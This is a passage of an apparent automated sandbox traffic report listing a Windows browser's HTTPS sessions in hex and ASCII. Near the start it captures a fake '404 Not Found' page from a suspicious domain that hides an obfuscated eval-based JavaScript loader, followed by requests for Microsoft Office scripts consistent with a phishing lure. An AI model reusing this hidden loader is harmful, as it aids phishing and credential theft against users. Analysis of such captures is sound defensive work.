                                                                                                    Data Ascii: 578<html><head><title>404 Not Found</title><meta name='referrer' content='no-referrer'><script> if (window.self!='google.com') {var _0xc16e=["","split","0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/","slice","indexOf","","",".","pow",
                                                                                                    2024-12-23 17:43:39 UTC843INData Raw: 5d 3b 77 68 69 6c 65 28 6a 3e 30 29 7b 6b 3d 69 5b 6a 25 66 5d 2b 6b 3b 6a 3d 28 6a 2d 28 6a 25 66 29 29 2f 66 7d 72 65 74 75 72 6e 20 6b 7c 7c 5f 30 78 63 31 36 65 5b 31 31 5d 7d 65 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 68 2c 75 2c 6e 2c 74 2c 65 2c 72 29 7b 72 3d 22 22 3b 66 6f 72 28 76 61 72 20 69 3d 30 2c 6c 65 6e 3d 68 2e 6c 65 6e 67 74 68 3b 69 3c 6c 65 6e 3b 69 2b 2b 29 7b 76 61 72 20 73 3d 22 22 3b 77 68 69 6c 65 28 68 5b 69 5d 21 3d 3d 6e 5b 65 5d 29 7b 73 2b 3d 68 5b 69 5d 3b 69 2b 2b 7d 66 6f 72 28 76 61 72 20 6a 3d 30 3b 6a 3c 6e 2e 6c 65 6e 67 74 68 3b 6a 2b 2b 29 73 3d 73 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 6e 5b 6a 5d 2c 22 67 22 29 2c 6a 29 3b 72 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 5f
                                                                                                    Data Ascii: ];while(j>0){k=i[j%f]+k;j=(j-(j%f))/f}return k||_0xc16e[11]}eval(function(h,u,n,t,e,r){r="";for(var i=0,len=h.length;i<len;i++){var s="";while(h[i]!==n[e]){s+=h[i];i++}for(var j=0;j<n.length;j++)s=s.replace(new RegExp(n[j],"g"),j);r+=String.fromCharCode(_
                                                                                                    2024-12-23 17:43:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.224916935.190.80.1443300C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 17:43:40 UTC544OUTOPTIONS /report/v4?s=UUaZ%2FHZfFyQVvb3r%2Fd0zCUCc6VTBRokIpiY89p5q3jNwkzgygg7taaKsBub10Zqq0GrUihLAcZQhlkJhISGUeC%2Fj24RxHJQh%2Bw5SF7OXoEo3ZWmiXG1s8NMu9GWMK34BL1OHlhop HTTP/1.1
                                                                                                    Host: a.nel.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Origin: https://jkqbjwq.maxiite.com
                                                                                                    Access-Control-Request-Method: POST
                                                                                                    Access-Control-Request-Headers: content-type
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 17:43:40 UTC336INHTTP/1.1 200 OK
                                                                                                    Content-Length: 0
                                                                                                    access-control-max-age: 86400
                                                                                                    access-control-allow-methods: POST, OPTIONS
                                                                                                    access-control-allow-origin: *
                                                                                                    access-control-allow-headers: content-type, content-length
                                                                                                    date: Mon, 23 Dec 2024 17:43:40 GMT
                                                                                                    Via: 1.1 google
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.224917235.190.80.1443300C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 17:43:42 UTC482OUTPOST /report/v4?s=UUaZ%2FHZfFyQVvb3r%2Fd0zCUCc6VTBRokIpiY89p5q3jNwkzgygg7taaKsBub10Zqq0GrUihLAcZQhlkJhISGUeC%2Fj24RxHJQh%2Bw5SF7OXoEo3ZWmiXG1s8NMu9GWMK34BL1OHlhop HTTP/1.1
                                                                                                    Host: a.nel.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Content-Length: 390
                                                                                                    Content-Type: application/reports+json
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 17:43:42 UTC390OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 35 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 36 35 34 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 31 30 2e 35 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6a 6b 71 62 6a 77 71 2e 6d 61 78 69 69 74 65
                                                                                                    Data Ascii: [{"age":25,"body":{"elapsed_time":2654,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.210.5","status_code":404,"type":"http.error"},"type":"network-error","url":"https://jkqbjwq.maxiite
                                                                                                    2024-12-23 17:43:42 UTC168INHTTP/1.1 200 OK
                                                                                                    Content-Length: 0
                                                                                                    date: Mon, 23 Dec 2024 17:43:42 GMT
                                                                                                    Via: 1.1 google
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.224928613.107.246.63443300C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 17:44:05 UTC552OUTGET /meversion?partner=office&market=en-us&uhf=1 HTTP/1.1
                                                                                                    Host: mem.gfx.ms
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: script
                                                                                                    Referer: https://www.office.com/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 17:44:06 UTC604INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 17:44:05 GMT
                                                                                                    Content-Type: application/javascript
                                                                                                    Content-Length: 30687
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Cache-Control: public, no-transform, max-age=43200
                                                                                                    Expires: Tue, 24 Dec 2024 05:44:05 GMT
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Methods: GET, OPTIONS
                                                                                                    X-UA-Compatible: IE=edge
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                    x-azure-ref: 20241223T174405Z-156796c549bv6fdshC1EWRsec80000000y00000000001xwg
                                                                                                    x-fd-int-roxy-purgeid: 38334287
                                                                                                    X-Cache: TCP_MISS
                                                                                                    Accept-Ranges: bytes
                                                                                                    2024-12-23 17:44:06 UTC15780INData Raw: 77 69 6e 64 6f 77 2e 4d 53 41 3d 77 69 6e 64 6f 77 2e 4d 53 41 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 4d 53 41 2e 4d 65 43 6f 6e 74 72 6f 6c 3d 77 69 6e 64 6f 77 2e 4d 53 41 2e 4d 65 43 6f 6e 74 72 6f 6c 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 4d 53 41 2e 4d 65 43 6f 6e 74 72 6f 6c 2e 43 6f 6e 66 69 67 3d 7b 22 76 65 72 22 3a 22 31 30 2e 32 34 32 32 38 2e 34 22 2c 22 6d 6b 74 22 3a 22 65 6e 2d 55 53 22 2c 22 70 74 6e 22 3a 22 6f 66 66 69 63 65 22 2c 22 67 66 78 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6d 63 64 6e 2e 6d 73 66 74 61 75 74 68 2e 6e 65 74 22 2c 22 64 62 67 22 3a 66 61 6c 73 65 2c 22 61 61 64 22 3a 74 72 75 65 2c 22 69 6e 74 22 3a 66 61 6c 73 65 2c 22 70 78 79 22 3a 74 72 75 65 2c 22 6d 73 54 78 74 22 3a 66 61 6c 73 65 2c 22 72 77 64 22 3a 74 72 75 65 2c
                                                                                                    Data Ascii: window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.24228.4","mkt":"en-US","ptn":"office","gfx":"https://amcdn.msftauth.net","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,
                                                                                                    2024-12-23 17:44:06 UTC14907INData Raw: 65 28 29 2e 74 68 65 6e 28 65 29 7d 29 2c 54 65 2e 5f 75 6e 68 61 6e 64 6c 65 64 52 65 6a 65 63 74 69 6f 6e 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 56 65 28 7b 65 76 65 6e 74 54 79 70 65 3a 22 43 6c 69 65 6e 74 45 72 72 6f 72 22 2c 69 73 43 72 69 74 69 63 61 6c 3a 21 30 2c 6e 61 6d 65 3a 65 2e 6d 65 73 73 61 67 65 7c 7c 22 28 66 61 6c 73 65 79 20 6d 65 73 73 61 67 65 20 70 72 6f 70 65 72 74 79 20 6f 6e 20 65 72 72 6f 72 29 22 2c 74 79 70 65 3a 22 55 6e 68 61 6e 64 6c 65 64 50 72 6f 6d 69 73 65 52 65 6a 65 63 74 69 6f 6e 22 2c 64 65 74 61 69 6c 73 3a 65 2e 73 74 61 63 6b 7c 7c 22 22 2c 64 69 73 70 6c 61 79 65 64 3a 21 31 2c 73 65 76 65 72 69 74 79 3a 65 2e 6d 63 49 73 54 69 6d 65 6f 75 74 3f 33 3a 32 7d 29 7d 3b 76 61 72 20 47 65 3d 5b 5d 3b 76 61 72
                                                                                                    Data Ascii: e().then(e)}),Te._unhandledRejectionFn=function(e){Ve({eventType:"ClientError",isCritical:!0,name:e.message||"(falsey message property on error)",type:"UnhandledPromiseRejection",details:e.stack||"",displayed:!1,severity:e.mcIsTimeout?3:2})};var Ge=[];var


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.224932113.107.246.63443300C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 17:44:08 UTC377OUTGET /meversion?partner=office&market=en-us&uhf=1 HTTP/1.1
                                                                                                    Host: mem.gfx.ms
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 17:44:08 UTC624INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 17:44:08 GMT
                                                                                                    Content-Type: application/javascript
                                                                                                    Content-Length: 30687
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Cache-Control: public, no-transform, max-age=43200
                                                                                                    Expires: Tue, 24 Dec 2024 05:44:05 GMT
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Methods: GET, OPTIONS
                                                                                                    X-UA-Compatible: IE=edge
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                    x-azure-ref: 20241223T174408Z-156796c549b4zs7hhC1EWRvcy80000000y2g0000000098v3
                                                                                                    x-fd-int-roxy-purgeid: 38334287
                                                                                                    X-Cache: TCP_HIT
                                                                                                    X-Cache-Info: L1_T2
                                                                                                    Accept-Ranges: bytes
                                                                                                    2024-12-23 17:44:08 UTC15760INData Raw: 77 69 6e 64 6f 77 2e 4d 53 41 3d 77 69 6e 64 6f 77 2e 4d 53 41 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 4d 53 41 2e 4d 65 43 6f 6e 74 72 6f 6c 3d 77 69 6e 64 6f 77 2e 4d 53 41 2e 4d 65 43 6f 6e 74 72 6f 6c 7c 7c 7b 7d 3b 77 69 6e 64 6f 77 2e 4d 53 41 2e 4d 65 43 6f 6e 74 72 6f 6c 2e 43 6f 6e 66 69 67 3d 7b 22 76 65 72 22 3a 22 31 30 2e 32 34 32 32 38 2e 34 22 2c 22 6d 6b 74 22 3a 22 65 6e 2d 55 53 22 2c 22 70 74 6e 22 3a 22 6f 66 66 69 63 65 22 2c 22 67 66 78 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6d 63 64 6e 2e 6d 73 66 74 61 75 74 68 2e 6e 65 74 22 2c 22 64 62 67 22 3a 66 61 6c 73 65 2c 22 61 61 64 22 3a 74 72 75 65 2c 22 69 6e 74 22 3a 66 61 6c 73 65 2c 22 70 78 79 22 3a 74 72 75 65 2c 22 6d 73 54 78 74 22 3a 66 61 6c 73 65 2c 22 72 77 64 22 3a 74 72 75 65 2c
                                                                                                    Data Ascii: window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.24228.4","mkt":"en-US","ptn":"office","gfx":"https://amcdn.msftauth.net","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,
                                                                                                    2024-12-23 17:44:08 UTC14927INData Raw: 75 72 6e 20 70 2e 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 2e 74 68 65 6e 28 65 29 7d 29 2c 54 65 2e 5f 75 6e 68 61 6e 64 6c 65 64 52 65 6a 65 63 74 69 6f 6e 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 56 65 28 7b 65 76 65 6e 74 54 79 70 65 3a 22 43 6c 69 65 6e 74 45 72 72 6f 72 22 2c 69 73 43 72 69 74 69 63 61 6c 3a 21 30 2c 6e 61 6d 65 3a 65 2e 6d 65 73 73 61 67 65 7c 7c 22 28 66 61 6c 73 65 79 20 6d 65 73 73 61 67 65 20 70 72 6f 70 65 72 74 79 20 6f 6e 20 65 72 72 6f 72 29 22 2c 74 79 70 65 3a 22 55 6e 68 61 6e 64 6c 65 64 50 72 6f 6d 69 73 65 52 65 6a 65 63 74 69 6f 6e 22 2c 64 65 74 61 69 6c 73 3a 65 2e 73 74 61 63 6b 7c 7c 22 22 2c 64 69 73 70 6c 61 79 65 64 3a 21 31 2c 73 65 76 65 72 69 74 79 3a 65 2e 6d 63 49 73 54 69 6d 65 6f 75 74 3f
                                                                                                    Data Ascii: urn p.Promise.resolve().then(e)}),Te._unhandledRejectionFn=function(e){Ve({eventType:"ClientError",isCritical:!0,name:e.message||"(falsey message property on error)",type:"UnhandledPromiseRejection",details:e.stack||"",displayed:!1,severity:e.mcIsTimeout?


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.224932013.107.246.63443300C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 17:44:08 UTC597OUTGET /scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js HTTP/1.1
                                                                                                    Host: js.monitor.azure.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
                                                                                                    Origin: https://www.office.com
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: script
                                                                                                    Referer: https://www.office.com/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 17:44:08 UTC892INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 17:44:08 GMT
                                                                                                    Content-Type: text/javascript; charset=utf-8
                                                                                                    Content-Length: 91802
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                    Last-Modified: Mon, 01 Jul 2024 17:02:58 GMT
                                                                                                    ETag: 0x8DC99EFA85DE069
                                                                                                    x-ms-request-id: fbe37448-a01e-0068-58b9-4b460a000000
                                                                                                    x-ms-version: 2009-09-19
                                                                                                    x-ms-meta-jssdkver: 3.2.18
                                                                                                    x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.shared.analytics.mectrl-3.2.18.gbl.min.js
                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    x-azure-ref: 20241223T174408Z-156796c549b6f4fzhC1EWRm0vs0000000yng000000001e8h
                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                    X-Cache: TCP_HIT
                                                                                                    Accept-Ranges: bytes
                                                                                                    2024-12-23 17:44:08 UTC15492INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 20 53 44 4b 20 53 68 61 72 65 64 20 41 6e 61 6c 79 74 69 63 73 2c 20 33 2e 32 2e 31 38 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 2c 72 3d 7b 7d 2c 69 3d 22 5f 5f 6d 73 24 6d 6f 64 5f 5f 22 2c 6f 3d 7b 7d 2c 61 3d 6f 2e 65 73 6d 5f 6d 73 5f 73 68 61 72 65 64 5f 61 6e 61 6c 79 74 69 63 73 5f 6d 65 63 74 72 6c 5f 33 5f 32 5f 31 38 3d 7b 7d 2c 75 3d 22 33 2e 32 2e 31 38 22 2c 63 3d 22 6f 6e 65 44 73 4d 65 43
                                                                                                    Data Ascii: /*! * 1DS JS SDK Shared Analytics, 3.2.18 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,n){var t,r={},i="__ms$mod__",o={},a=o.esm_ms_shared_analytics_mectrl_3_2_18={},u="3.2.18",c="oneDsMeC
                                                                                                    2024-12-23 17:44:08 UTC16384INData Raw: 6f 7d 76 61 72 20 48 72 3d 22 74 6f 47 4d 54 53 74 72 69 6e 67 22 2c 6a 72 3d 22 74 6f 55 54 43 53 74 72 69 6e 67 22 2c 57 72 3d 22 63 6f 6f 6b 69 65 22 2c 58 72 3d 22 65 78 70 69 72 65 73 22 2c 47 72 3d 22 65 6e 61 62 6c 65 64 22 2c 51 72 3d 22 69 73 43 6f 6f 6b 69 65 55 73 65 44 69 73 61 62 6c 65 64 22 2c 4a 72 3d 22 64 69 73 61 62 6c 65 43 6f 6f 6b 69 65 73 55 73 61 67 65 22 2c 24 72 3d 22 5f 63 6b 4d 67 72 22 2c 5a 72 3d 6e 75 6c 6c 2c 59 72 3d 6e 75 6c 6c 2c 65 69 3d 6e 75 6c 6c 2c 6e 69 3d 24 74 28 29 2c 74 69 3d 7b 7d 2c 72 69 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 69 28 65 29 7b 72 65 74 75 72 6e 21 65 7c 7c 65 2e 69 73 45 6e 61 62 6c 65 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 69 28 65 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 26 26 65 26 26 72 65
                                                                                                    Data Ascii: o}var Hr="toGMTString",jr="toUTCString",Wr="cookie",Xr="expires",Gr="enabled",Qr="isCookieUseDisabled",Jr="disableCookiesUsage",$r="_ckMgr",Zr=null,Yr=null,ei=null,ni=$t(),ti={},ri={};function ii(e){return!e||e.isEnabled()}function oi(e,n){return n&&e&&re
                                                                                                    2024-12-23 17:44:09 UTC16384INData Raw: 20 72 5b 6e 65 5d 7d 2c 70 2e 72 65 6c 65 61 73 65 51 75 65 75 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 67 26 26 30 3c 72 5b 6e 65 5d 26 26 28 65 3d 72 2c 72 3d 5b 5d 2c 69 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 79 28 29 5b 46 5d 28 65 29 7d 29 29 7d 2c 70 2e 70 6f 6c 6c 49 6e 74 65 72 6e 61 6c 4c 6f 67 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 50 3d 65 7c 7c 6e 75 6c 6c 2c 4e 3d 21 31 2c 41 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 41 29 2c 41 3d 6e 75 6c 6c 29 2c 68 28 21 30 29 7d 2c 70 5b 4b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 4e 3d 21 30 2c 41 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 41 29 2c 41 3d 30 2c 66 28 29 29 7d 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20
                                                                                                    Data Ascii: r[ne]},p.releaseQueue=function(){var e;g&&0<r[ne]&&(e=r,r=[],ie(e,function(e){y()[F](e)}))},p.pollInternalLogs=function(e){return P=e||null,N=!1,A&&(clearInterval(A),A=null),h(!0)},p[Ke]=function(){N=!0,A&&(clearInterval(A),A=0,f())},t=function(){return
                                                                                                    2024-12-23 17:44:09 UTC16384INData Raw: 72 3a 63 2e 41 4e 44 52 4f 49 44 2c 6f 73 3a 22 41 6e 64 72 6f 69 64 22 7d 2c 7b 72 3a 63 2e 4c 49 4e 55 58 2c 6f 73 3a 22 4c 69 6e 75 78 22 7d 2c 7b 72 3a 63 2e 43 52 4f 53 2c 6f 73 3a 22 43 68 72 6f 6d 65 20 4f 53 22 7d 2c 7b 73 3a 22 78 31 31 22 2c 6f 73 3a 22 55 6e 69 78 22 7d 2c 7b 73 3a 22 62 6c 61 63 6b 62 65 72 72 79 22 2c 6f 73 3a 22 42 6c 61 63 6b 42 65 72 72 79 22 7d 2c 7b 73 3a 22 73 79 6d 62 69 61 6e 22 2c 6f 73 3a 22 53 79 6d 62 69 61 6e 22 7d 2c 7b 73 3a 22 6e 6f 6b 69 61 22 2c 6f 73 3a 22 4e 6f 6b 69 61 22 7d 2c 7b 72 3a 63 2e 4f 53 58 2c 6f 73 3a 22 4d 61 63 20 4f 53 20 58 22 7d 5d 3b 66 75 6e 63 74 69 6f 6e 20 7a 61 28 65 2c 6e 29 7b 6e 3d 65 2e 6d 61 74 63 68 28 52 65 67 45 78 70 28 6e 2b 22 20 22 2b 4c 61 29 29 3b 72 65 74 75 72 6e 20
                                                                                                    Data Ascii: r:c.ANDROID,os:"Android"},{r:c.LINUX,os:"Linux"},{r:c.CROS,os:"Chrome OS"},{s:"x11",os:"Unix"},{s:"blackberry",os:"BlackBerry"},{s:"symbian",os:"Symbian"},{s:"nokia",os:"Nokia"},{r:c.OSX,os:"Mac OS X"}];function za(e,n){n=e.match(RegExp(n+" "+La));return
                                                                                                    2024-12-23 17:44:09 UTC16384INData Raw: 61 72 20 6f 3d 6f 26 26 6f 2e 73 6c 69 63 65 28 29 2c 73 3d 30 3b 73 3c 63 2d 31 3b 73 2b 2b 29 7b 76 61 72 20 6c 3d 75 5b 73 5d 2c 61 3d 61 5b 6c 5d 3d 61 5b 6c 5d 7c 7c 7b 7d 3b 72 2b 3d 22 2e 22 2b 6c 2c 6f 26 26 6f 2e 70 75 73 68 28 6c 29 7d 69 3d 75 5b 63 2d 31 5d 7d 7d 28 65 3d 76 26 26 28 28 74 3d 53 5b 65 3d 72 5d 29 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 37 3c 3d 65 2e 6c 65 6e 67 74 68 26 26 28 74 3d 61 74 28 65 2c 22 65 78 74 2e 6d 65 74 61 64 61 74 61 22 29 7c 7c 61 74 28 65 2c 22 65 78 74 2e 77 65 62 22 29 29 2c 53 5b 65 5d 3d 74 29 2c 74 29 7c 7c 21 62 7c 7c 21 62 2e 68 61 6e 64 6c 65 46 69 65 6c 64 28 72 2c 69 29 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 65 26 26 21 58 6f 28 65 29 7c 7c 22 73 74 72 69 6e 67 22 21 3d 74
                                                                                                    Data Ascii: ar o=o&&o.slice(),s=0;s<c-1;s++){var l=u[s],a=a[l]=a[l]||{};r+="."+l,o&&o.push(l)}i=u[c-1]}}(e=v&&((t=S[e=r])===undefined&&(7<=e.length&&(t=at(e,"ext.metadata")||at(e,"ext.web")),S[e]=t),t)||!b||!b.handleField(r,i)?function(e,n){if(!e&&!Xo(e)||"string"!=t
                                                                                                    2024-12-23 17:44:09 UTC10774INData Raw: 51 3f 4d 61 74 68 2e 6d 69 6e 28 51 2c 72 29 3a 72 2c 6b 3d 4d 61 74 68 2e 6d 61 78 28 6b 2c 6e 29 29 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 71 3d 7b 52 45 41 4c 5f 54 49 4d 45 3a 5b 32 2c 31 2c 30 5d 2c 4e 45 41 52 5f 52 45 41 4c 5f 54 49 4d 45 3a 5b 36 2c 33 2c 30 5d 2c 42 45 53 54 5f 45 46 46 4f 52 54 3a 5b 31 38 2c 39 2c 30 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 6e 29 7b 76 61 72 20 74 3d 5b 5d 2c 72 3d 24 3f 59 3a 5a 3b 69 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 30 3c 65 2e 63 6f 75 6e 74 28 29 26 26 69 65 28 65 2e 65 76 65 6e 74 73 28 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 28 65 2e 73 79 6e 63 26 26 28 65 2e 6c 61 74 65 6e 63 79 3d 34 2c 65 2e 73 79 6e 63 3d 21 31 29 2c 65 2e 73 65 6e 64 41 74 74 65 6d
                                                                                                    Data Ascii: Q?Math.min(Q,r):r,k=Math.max(k,n)),i}function n(){q={REAL_TIME:[2,1,0],NEAR_REAL_TIME:[6,3,0],BEST_EFFORT:[18,9,0]}}function e(e,n){var t=[],r=$?Y:Z;ie(e,function(e){e&&0<e.count()&&ie(e.events(),function(e){e&&(e.sync&&(e.latency=4,e.sync=!1),e.sendAttem


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.224936113.107.246.63443300C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 17:44:11 UTC393OUTGET /scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js HTTP/1.1
                                                                                                    Host: js.monitor.azure.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 17:44:11 UTC913INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 17:44:11 GMT
                                                                                                    Content-Type: text/javascript; charset=utf-8
